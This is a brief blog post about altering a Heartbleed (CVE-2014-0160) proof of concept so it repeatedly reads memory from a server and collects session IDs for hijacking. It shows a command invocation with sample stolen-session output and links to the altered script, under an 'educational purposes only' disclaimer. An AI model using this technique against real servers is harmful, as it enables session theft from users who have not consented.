Edit: Many people have commented on the fact that this would very likely land you in prison if you were to use it on unauthorized servers. This and any other exploit code you use on servers that you do not own is very much against the law. This code is for educational purposes only, and I take no resonsiblility for you doing something stupid with it.
If you have been living under a rock recently, Heartbleed is a bug in OpenSSL that allows anyone on the internet to read sections of memory on vulnerable servers.
Matthew Sullivan posted a blog post earlier today about using CVE-2014–0160 to hijack user sessions from vulnerable servers. I altered the proof of concept code written by Jared Stafford to continuously query a given server for memory chunks and parse those chunks for session ids.
Some very simple checks are in place to only spit out unique session IDs. You can check out Sullivan’s blog post to see how these session IDs can be inserted into a web browser to steal these users sessions.
➜ ~ ./heartbleed-altered.py your_server.com session session=1395650268 session=1552654927 session=9074328142 session=1584630615 session=1399867484 session=1570915943 session=6442471150 session=1134475661 session=1828846521 session=1025417958 session=1429746458 session=9503698952 session=3413620908 session=5569288762 session=3669059145 session=1624974555 session=1070329834 session=1747925477 session=1129670396 session=1017137517 session=2331559646
Altered Script is available at https://gist.github.com/mpdavis/10171593